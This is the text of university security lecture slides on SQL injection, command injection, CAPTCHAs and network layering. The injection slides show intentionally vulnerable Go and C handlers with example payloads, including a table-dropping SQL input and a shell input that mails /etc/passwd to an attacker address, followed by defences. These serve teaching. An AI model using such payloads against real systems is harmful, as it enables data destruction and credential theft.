SQL Injection, CAPTCHAs, and Intro to the Internet
CS 161 Spring 2022 - Lecture 16
Computer Science 161
Nicholas Weaver
Last Time: XSS
2
Computer Science 161
Nicholas Weaver
Last Time: XSS Defenses
3
Computer Science 161
Nicholas Weaver
Last Time: Clickjacking
4
Computer Science 161
Nicholas Weaver
Last Time: Phishing
5
Computer Science 161
Nicholas Weaver
Today: SQL Injection and CAPTCHAS
6
Computer Science 161
Nicholas Weaver
SQL Injection
7
Computer Science 161
Nicholas Weaver
Top 25 Most Dangerous Software Weaknesses (2020)
8
Rank | ID | Name | Score |
[1] | Improper Neutralization of Input During Web Page Generation (’Cross-site Scripting’) | 46.82 | |
[2] | Out-of-bounds Write | 46.17 | |
[3] | Improper Input Validation | 33.47 | |
[4] | Out-of-bounds Read | 26.50 | |
[5] | Improper Restriction of Operations within the Bounds of a Memory Buffer | 23.73 | |
[6] | Improper Neutralization of Special Elements used in an SQL Command (’SQL Injection’) | 20.69 | |
[7] | Exposure of Sensitive Information to an Unauthorized Actor | 19.16 | |
[8] | Use After Free | 18.87 | |
[9] | Cross-Site Request Forgery (CSRF) | 17.29 | |
[10] | Improper Neutralization of Special Elements used in an OS Command (’OS Command Injection’) | 16.44 | |
[11] | Integer Overflow or Wraparound | 15.81 | |
[12] | Improper Limitation of a Pathname to a Restricted Directory (’Path Traversal’) | 13.67 | |
[13] | NULL Pointer Dereference | 8.35 | |
[14] | Improper Authentication | 8.17 | |
[15] | Unrestricted Upload of File with Dangerous Type | 7.38 | |
[16] | Incorrect Permission Assignment for Critical Resource | 6.95 | |
[17] | Improper Control of Generation of Code (’Code Injection’) | 6.53 |
Computer Science 161
Nicholas Weaver
Structure of Web Services
9
Computer Science 161
Nicholas Weaver
Structure of Web Services
10
Client
Handle HTML, CSS, JavaScript, etc.
Web Server
Process requests and handle server-side logic
Database Server
Store and provide access to persistent data
2. HTTP GET request
3. Interpret request
4. Query database
5. Return data
6. Construct response
7. HTTP response
1. User requests page
8. Browser renders page
HTTP
SQL (usually)
Computer Science 161
Nicholas Weaver
Databases
11
bots | |||
id | name | likes | age |
1 | evanbot | pancakes | 3 |
2 | codabot | hashes | 2.5 |
3 | pintobot | beans | 1.5 |
3 rows, 4 columns |
Computer Science 161
Nicholas Weaver
SQL
12
Computer Science 161
Nicholas Weaver
Nick’s Thoughts on Databases…
13
Computer Science 161
Nicholas Weaver
SQL: SELECT
14
bots | |||
id | name | likes | age |
1 | evanbot | pancakes | 3 |
2 | codabot | hashes | 2.5 |
3 | pintobot | beans | 1.5 |
3 rows, 4 columns |
Computer Science 161
Nicholas Weaver
SQL: SELECT
SELECT name, age FROM bots
15
bots | |||
id | name | likes | age |
1 | evanbot | pancakes | 3 |
2 | codabot | hashes | 2.5 |
3 | pintobot | beans | 1.5 |
3 rows, 4 columns |
name | age |
evanbot | 3 |
codabot | 2.5 |
pintobot | 1.5 |
3 rows, 2 columns |
Selected 2 columns from the table, keeping all rows.
Computer Science 161
Nicholas Weaver
SQL: SELECT
SELECT * FROM bots
16
bots | |||
id | name | likes | age |
1 | evanbot | pancakes | 3 |
2 | codabot | hashes | 2.5 |
3 | pintobot | beans | 1.5 |
3 rows, 4 columns |
id | name | likes | age |
1 | evanbot | pancakes | 3 |
2 | codabot | hashes | 2.5 |
3 | pintobot | beans | 1.5 |
3 rows, 4 columns |
The asterisk (*) is shorthand for “all columns.” Select all columns from the table, keeping all rows.
Computer Science 161
Nicholas Weaver
SQL: SELECT
SELECT 'CS', '161' FROM bots
17
bots | |||
id | name | likes | age |
1 | evanbot | pancakes | 3 |
2 | codabot | hashes | 2.5 |
3 | pintobot | beans | 1.5 |
3 rows, 4 columns |
id | name |
CS | 161 |
CS | 161 |
CS | 161 |
3 rows, 2 columns |
Select constants instead of columns
Computer Science 161
Nicholas Weaver
SQL: WHERE
18
bots | |||
id | name | likes | age |
1 | evanbot | pancakes | 3 |
2 | codabot | hashes | 2.5 |
3 | pintobot | beans | 1.5 |
3 rows, 4 columns |
Computer Science 161
Nicholas Weaver
SQL: WHERE
SELECT * FROM bots�WHERE likes = 'pancakes'
19
bots | |||
id | name | likes | age |
1 | evanbot | pancakes | 3 |
2 | codabot | hashes | 2.5 |
3 | pintobot | beans | 1.5 |
3 rows, 4 columns |
Choose only the rows where the likes column has value pancakes
id | name | likes | age |
1 | evanbot | pancakes | 3 |
1 row, 4 columns |
Computer Science 161
Nicholas Weaver
SQL: WHERE
SELECT name FROM bots�WHERE age < 2 OR id = 1
20
bots | |||
id | name | likes | age |
1 | evanbot | pancakes | 3 |
2 | codabot | hashes | 2.5 |
3 | pintobot | beans | 1.5 |
3 rows, 4 columns |
Get all names of bots whose age is less than 2 or whose id is 1
name |
evanbot |
pintobot |
2 rows, 1 column |
(selected because id is 1)
(selected because age is 1.5)
Computer Science 161
Nicholas Weaver
SQL: INSERT INTO
21
bots | |||
id | name | likes | age |
1 | evanbot | pancakes | 3 |
2 | codabot | hashes | 2.5 |
3 | pintobot | beans | 1.5 |
3 rows, 4 columns |
Computer Science 161
Nicholas Weaver
SQL: INSERT INTO
INSERT INTO items VALUES�(4, 'willow', 'catnip', 5),�(5, 'luna', 'naps', 7)
22
bots | |||
id | name | likes | age |
1 | evanbot | pancakes | 3 |
2 | codabot | hashes | 2.5 |
3 | pintobot | beans | 1.5 |
4 | willow | catnip | 5 |
5 | luna | naps | 7 |
5 rows, 4 columns |
This statement results in two extra rows being added to the table
Computer Science 161
Nicholas Weaver
SQL: UPDATE
23
bots | |||
id | name | likes | age |
1 | evanbot | pancakes | 3 |
2 | codabot | hashes | 2.5 |
3 | pintobot | beans | 1.5 |
4 | willow | catnip | 5 |
5 | luna | naps | 7 |
5 rows, 4 columns |
Computer Science 161
Nicholas Weaver
SQL: UPDATE
UPDATE bots�SET age = 6�WHERE name = 'willow'
24
bots | |||
id | name | likes | age |
1 | evanbot | pancakes | 3 |
2 | codabot | hashes | 2.5 |
3 | pintobot | beans | 1.5 |
4 | willow | catnip | 6 |
5 | luna | naps | 7 |
5 rows, 4 columns |
This statement results in this cell in the table being changed. If the WHERE clause was missing, every value in the age column would be set to 6.
Computer Science 161
Nicholas Weaver
SQL: DELETE
25
bots | |||
id | name | likes | age |
1 | evanbot | pancakes | 3 |
2 | codabot | hashes | 2.5 |
3 | pintobot | beans | 1.5 |
4 | willow | catnip | 6 |
5 | luna | naps | 7 |
5 rows, 4 columns |
Computer Science 161
Nicholas Weaver
SQL: DELETE
DELETE FROM bots�WHERE age >= 6
26
bots | |||
id | name | likes | age |
1 | evanbot | pancakes | 3 |
2 | codabot | hashes | 2.5 |
3 | pintobot | beans | 1.5 |
4 | willow | catnip | 6 |
5 | luna | naps | 7 |
3 rows, 4 columns |
This statement results in two rows being deleted from the table
Computer Science 161
Nicholas Weaver
SQL: CREATE
27
bots | |||
id | name | likes | age |
1 | evanbot | pancakes | 3 |
2 | codabot | hashes | 2.5 |
3 | pintobot | beans | 1.5 |
3 rows, 4 columns |
Computer Science 161
Nicholas Weaver
SQL: CREATE
CREATE TABLE cats (� id INT,� name VARCHAR(255),� likes VARCHAR(255),� age INT�)
28
bots | |||
id | name | likes | age |
1 | evanbot | pancakes | 3 |
2 | codabot | hashes | 2.5 |
3 | pintobot | beans | 1.5 |
3 rows, 4 columns |
cats | |||
id | name | likes | age |
0 rows, 4 columns |
This statement results in a new table being created with the given columns
Note: VARCHAR(255) is a string type
Computer Science 161
Nicholas Weaver
SQL: DROP
29
bots | |||
id | name | likes | age |
1 | evanbot | pancakes | 3 |
2 | codabot | hashes | 2.5 |
3 | pintobot | beans | 1.5 |
3 rows, 4 columns |
cats | |||
id | name | likes | age |
0 rows, 4 columns |
Computer Science 161
Nicholas Weaver
SQL: DROP
DROP TABLE bots
30
bots | |||
id | name | likes | age |
1 | evanbot | pancakes | 3 |
2 | codabot | hashes | 2.5 |
3 | pintobot | beans | 1.5 |
0 rows, 0 columns |
cats | |||
id | name | likes | age |
0 rows, 4 columns |
This statement results in the entire bots table being deleted
Computer Science 161
Nicholas Weaver
SQL: Syntax Characters
31
Computer Science 161
Nicholas Weaver
A Go HTTP Handler (Again)
32
func handleGetItems(w http.ResponseWriter, r *http.Request) {
itemName := r.URL.Query()["item"][0]
db := getDB()
query := fmt.Sprintf("SELECT name, price FROM items WHERE name = '%s'", itemName)
row, err := db.QueryRow(query)
...
}
SELECT item, price FROM items WHERE name = 'paperclips'
https://vulnerable.com/get-items?item=paperclips
Handler
URL
Query
Remember this string manipulation issue?
Computer Science 161
Nicholas Weaver
A Go HTTP Handler (Again)
33
func handleGetItems(w http.ResponseWriter, r *http.Request) {
itemName := r.URL.Query()["item"][0]
db := getDB()
query := fmt.Sprintf("SELECT name, price FROM items WHERE name = '%s'", itemName)
row, err := db.QueryRow(query)
...
}
SELECT item, price FROM items WHERE name = '''
https://vulnerable.com/get-items?item='
Handler
URL
Query
Invalid SQL executed by the server, 500 Internal Server Error
Computer Science 161
Nicholas Weaver
A Go HTTP Handler (Again)
34
func handleGetItems(w http.ResponseWriter, r *http.Request) {
itemName := r.URL.Query()["item"][0]
db := getDB()
query := fmt.Sprintf("SELECT name, price FROM items WHERE name = '%s'", itemName)
row, err := db.QueryRow(query)
...
}
SELECT item, price FROM items WHERE name = '' OR '1' = '1'
https://vulnerable.com/get-items?item=' OR '1' = '1
Handler
URL
Query
This is essentially OR TRUE, so returns every item!
Computer Science 161
Nicholas Weaver
A Go HTTP Handler (Again)
35
func handleGetItems(w http.ResponseWriter, r *http.Request) {
itemName := r.URL.Query()["item"][0]
db := getDB()
query := fmt.Sprintf("SELECT name, price FROM items WHERE name = '%s'", itemName)
row, err := db.QueryRow(query)
...
}
SELECT item, price FROM items WHERE name = ''; DROP TABLE items --'
https://vulnerable.com/get-items?item='; DROP TABLE items --
Handler
URL
Query
For this payload: End the first quote ('), then start a new statement (DROP TABLE items), then comment out the remaining quote (--)
Computer Science 161
Nicholas Weaver
SQL Injection
36
Computer Science 161
Nicholas Weaver
Exploits of a Mom
37
Computer Science 161
Nicholas Weaver
Roadside SQLi
38
Computer Science 161
Nicholas Weaver
Blind SQL Injection
39
Computer Science 161
Nicholas Weaver
Blind SQL Injection Tools
40
Computer Science 161
Nicholas Weaver
SQL Injection Defenses
41
func handleGetItems(w http.ResponseWriter, r *http.Request) {
itemName := r.URL.Query()["item"][0]
itemName = sqlEscape(itemName)
db := getDB()
query := fmt.Sprintf("SELECT name, price FROM items WHERE name = '%s'", itemName)
row, err := db.QueryRow(query)
...
}
Computer Science 161
Nicholas Weaver
SQL Injection Defenses
42
Computer Science 161
Nicholas Weaver
SQL Injection Defenses
43
func handleGetItems(w http.ResponseWriter, r *http.Request) {
itemName := r.URL.Query()["item"][0]
db := getDB()
row, err := db.QueryRow("SELECT name, price FROM items WHERE name = ?", itemName)
...
}
Computer Science 161
Nicholas Weaver
SQL Injection Defenses
44
Computer Science 161
Nicholas Weaver
Cat Break
45
Computer Science 161
Nicholas Weaver
Command Injection
46
Computer Science 161
Nicholas Weaver
Command Injection
47
Computer Science 161
Nicholas Weaver
system Command Injection
48
void find_employee(char *regex) {
char cmd[512];
snprintf(cmd, sizeof cmd, "grep '%s' phonebook.txt", regex);
system(cmd);
}
grep 'weaver' phonebook.txt
regex = "weaver"
Handler
Parameter
system Command
String manipulation again!
Computer Science 161
Nicholas Weaver
system Command Injection
49
void find_employee(char *regex) {
char cmd[512];
snprintf(cmd, sizeof cmd, "grep '%s' phonebook.txt", regex);
system(cmd);
}
grep ''; mail mallory@evil.com < /etc/passwd; touch '' phonebook.txt
regex = "'; mail mallory@evil.com < /etc/passwd; touch '"
Handler
Parameter
system Command
Computer Science 161
Nicholas Weaver
Defending Against Command Injection in General
50
Computer Science 161
Nicholas Weaver
Updates to your "Joined an Existing Project" List: �Easy things with huge impact
51
Computer Science 161
Nicholas Weaver
CAPTCHAs
52
Computer Science 161
Nicholas Weaver
Websites are for Humans
53
Computer Science 161
Nicholas Weaver
CAPTCHAs: Definition
54
Computer Science 161
Nicholas Weaver
CAPTCHAs: Examples
55
Computer Science 161
Nicholas Weaver
CAPTCHAs and Machine Learning
56
Computer Science 161
Nicholas Weaver
CAPTCHAs and Machine Learning
57
Takeaway: Modern CAPTCHAs are used to train machine learning algorithms
Computer Science 161
Nicholas Weaver
CAPTCHAs: Issues
58
Computer Science 161
Nicholas Weaver
CAPTCHAs: Attacks
59
Computer Science 161
Nicholas Weaver
SQL Injection: Summary
60
Computer Science 161
Nicholas Weaver
CAPTCHAs: Summary
61
Computer Science 161
Nicholas Weaver
What’s the Internet?
62
Computer Science 161
Nicholas Weaver
What’s the Internet?
63
Computer Science 161
Nicholas Weaver
Protocols
64
Computer Science 161
Nicholas Weaver
Layering: The OSI Model
65
Computer Science 161
Nicholas Weaver
Layering
66
Code You Write
Run-Time Library
System Calls
Device Drivers
Voltage Levels/Magnetic Domains
Fully isolated from user programs
Computer Science 161
Nicholas Weaver
Example: Sending Mail
67
Alice
Bob
I am hungry.
Computer Science 161
Nicholas Weaver
Example: Sending Mail
68
Alice
Bob
Send to: Bob
I am hungry.
Computer Science 161
Nicholas Weaver
Example: Sending Mail
69
Alice
Bob
Mail to: 123 Bob St
Send to: Bob
I am hungry.
Computer Science 161
Nicholas Weaver
Example: Sending Mail
70
Alice
Bob
Mail to: 123 Bob St
Send to: Bob
I am hungry.
Computer Science 161
Nicholas Weaver
Example: Sending Mail
71
Alice
Bob
Send to: Bob
I am hungry.
Computer Science 161
Nicholas Weaver
Example: Sending Mail
72
Alice
Bob
I am hungry.
Computer Science 161
Nicholas Weaver
Example: Sending Mail
73
Alice
Bob
Each layer communicates with each other, relying on abstractions below them!
Relies upon: Sending messages to people
Provides: Sending messages to people
Relies upon: Sending messages to addresses
Provides: Sending messages to addresses
Computer Science 161
Nicholas Weaver
OSI Model
74
Application
Transport
(Inter) Network
Link
Physical
1
2
3
4
7
Computer Science 161
Nicholas Weaver
Layer 1: Physical Layer
75
Physical
1
Application
Transport
(Inter) Network
Link
2
3
4
7
Computer Science 161
Nicholas Weaver
Layer 1: Physical Layer
76
Physical
1
Application
Transport
(Inter) Network
Link
2
3
4
7
A
B
01110111…01
Physical layer: “How do I transmit this sequence of 0’s and 1’s from A to B?”
Next: How do we talk to more than one device?
Computer Science 161
Nicholas Weaver
Layer 2: Link Layer
77
Physical
1
Application
Transport
(Inter) Network
3
4
7
Link
2
Computer Science 161
Nicholas Weaver
Layer 2: Link Layer
78
Source: A
Destination: C
“Hello, this is A…”
A
B
D
C
Computer Science 161
Nicholas Weaver
Layer 2: Link Layer
79
Source: A
Dest: C
“Hello, this is A…”
A
B
C
D
E
Computer Science 161
Nicholas Weaver
Ethernet and MAC Addresses
Ethernet header
80
Source MAC Address (6 bytes) | |||||
Destination MAC Address (6 bytes) | |||||
VLAN Tag (4 bytes) | Type (2 bytes) | ||||
Data (variable-length) |
Computer Science 161
Nicholas Weaver
Ethernet and MAC Addresses
81
Computer Science 161
Nicholas Weaver
Layer 2: Link Layer
82
Physical
1
Application
Transport
(Inter) Network
3
4
7
Link
2
Source: A
Dest: C
“Hello, this is A…”
Link layer: “How do I transmit this frame from A to C, making sure that no one else thinks the message is for them?”
Next: How do we address every device in existence?
A
B
D
C
Computer Science 161
Nicholas Weaver
Layer 3: Network Layer
83
Physical
1
Application
Transport
4
7
(Inter) Network
3
Link
2
Computer Science 161
Nicholas Weaver
Layer 3: Network Layer
84
A
B
D
C
E
F
G
H
Router
Computer Science 161
Nicholas Weaver
Layer 3: Network Layer
85
A
Router
C
D
E
B
Router
Router
Router
Router
Router
Router
Source: A
Destination: D
“Hello, this is A…”
Computer Science 161
Nicholas Weaver
Layer 3: Network Layer
86
A
Router
C
D
E
B
Router
Router
Router
Router
Router
Router
Source: A
Destination: D
“Hello, this is A…”
This link could be Wi-Fi
And this link could be Ethernet
But the Internet protocol stays the same, end to end
Computer Science 161
Nicholas Weaver
Layer 3: Network Layer
87
Computer Science 161
Nicholas Weaver
Internet Protocol (IP)
IPv4 header
88
Version (4 bits) | Header Length (4 bits) | Type of Service (6 bits) | ECN (2 bits) | Total Length (16 bits) | |||||||||||
Identification (16 bits) | Flags (3 bits) | Fragment Offset (13 bits) | |||||||||||||
Time to Live (8 bits) | Protocol (8 bits) | Header Checksum (16 bits) | |||||||||||||
Source Address (32 bits) | |||||||||||||||
Destination Address (32 bits) | |||||||||||||||
Options (variable length) | |||||||||||||||
Data (variable length) |
Computer Science 161
Nicholas Weaver
Internet Protocol (IP)
89
Computer Science 161
Nicholas Weaver
Reliability
90
Computer Science 161
Nicholas Weaver
Layer 3: Network Layer
91
A
Router
C
D
E
B
Router
Router
Router
Router
Router
Router
Source: A
Destination: D
“Hello, this is A…”
Layer 3: “How do I get this packet from A to D?”
Next: How do we reliably send any length of data, not just packets?
Computer Science 161
Nicholas Weaver
Layer 4: Transport Layer
92
Physical
1
Application
7
Link
2
(Inter) Network
3
Transport
4
Computer Science 161
Nicholas Weaver
Layer 4: Transport Layer
93
A
D
I am now sending an arbitrary length message that will probably be broken into several packets…
Unreliable Internet
Layer 4: “How do I transport this arbitrary data over an unreliable medium?”
Computer Science 161
Nicholas Weaver
Layer 7: Application Layer
94
Physical
1
Link
2
(Inter) Network
3
Transport
4
Application
7
Computer Science 161
Nicholas Weaver
Layers of Abstraction and Headers
95
Computer Science 161
Nicholas Weaver
Example: HTTP Request
96
HTTP
TCP
IP
Ethernet
Wires
HTTP
TCP
IP
Ethernet
Wires
GET / HTTP/1.1
...
Computer Science 161
Nicholas Weaver
Example: HTTP Request
97
HTTP
TCP
IP
Ethernet
Wires
HTTP
TCP
IP
Ethernet
Wires
From: Port 1234
To: Port 80
GET / HTTP/1.1
...
Computer Science 161
Nicholas Weaver
Example: HTTP Request
98
HTTP
TCP
IP
Ethernet
Wires
HTTP
TCP
IP
Ethernet
Wires
From: 1.2.3.4
To: 5.6.7.8
From: Port 1234
To: Port 80
GET / HTTP/1.1
...
Final destination
Computer Science 161
Nicholas Weaver
Example: HTTP Request
99
HTTP
TCP
IP
Ethernet
Wires
HTTP
TCP
IP
Ethernet
Wires
From: 20:61:84:3a:a9:52
To: 6d:36:ff:4a:32:92
From: 1.2.3.4
To: 5.6.7.8
From: Port 1234
To: Port 80
GET / HTTP/1.1
...
Address of next hop
Computer Science 161
Nicholas Weaver
Example: HTTP Request
100
HTTP
TCP
IP
Ethernet
Wires
HTTP
TCP
IP
Ethernet
Wires
From: 20:61:84:3a:a9:52
To: 6d:36:ff:4a:32:92
From: 1.2.3.4
To: 5.6.7.8
From: Port 1234
To: Port 80
GET / HTTP/1.1
...
Converted into bits and transmitted
Computer Science 161
Nicholas Weaver
Example: HTTP Request
101
HTTP
TCP
IP
Ethernet
Wires
HTTP
TCP
IP
Ethernet
Wires
From: 89:8d:33:25:47:24
To: d5:a9:20:68:e0:80
From: 1.2.3.4
To: 5.6.7.8
From: Port 1234
To: Port 80
GET / HTTP/1.1
...
Received over the physical medium
Notice: The MAC addresses changed because the recipient is on a different network
Computer Science 161
Nicholas Weaver
Example: HTTP Request
102
HTTP
TCP
IP
Ethernet
Wires
HTTP
TCP
IP
Ethernet
Wires
From: 89:8d:33:25:47:24
To: d5:a9:20:68:e0:80
From: 1.2.3.4
To: 5.6.7.8
From: Port 1234
To: Port 80
GET / HTTP/1.1
...
Computer Science 161
Nicholas Weaver
Example: HTTP Request
103
HTTP
TCP
IP
Ethernet
Wires
HTTP
TCP
IP
Ethernet
Wires
From: 1.2.3.4
To: 5.6.7.8
From: Port 1234
To: Port 80
GET / HTTP/1.1
...
Computer Science 161
Nicholas Weaver
Example: HTTP Request
104
HTTP
TCP
IP
Ethernet
Wires
HTTP
TCP
IP
Ethernet
Wires
From: Port 1234
To: Port 80
GET / HTTP/1.1
...
Computer Science 161
Nicholas Weaver
Example: HTTP Request
105
HTTP
TCP
IP
Ethernet
Wires
HTTP
TCP
IP
Ethernet
Wires
GET / HTTP/1.1
...
Computer Science 161
Nicholas Weaver
Example: HTTP Request
106
HTTP
TCP
IP
Ethernet
Wires
HTTP
TCP
IP
Ethernet
Wires
Relies upon: Transport of data
Provides: Transport of data
Relies upon: Global packet delivery
Provides: Global packet delivery
Relies upon: Local frame delivery
Provides: Local frame delivery
Relies upon: Communication of bits
Provides: Communication of bits
Computer Science 161
Nicholas Weaver
Summary: Intro to Networking
107
Application
Transport
(Inter) Network
Link
Physical
1
2
3
4
7
Computer Science 161
Nicholas Weaver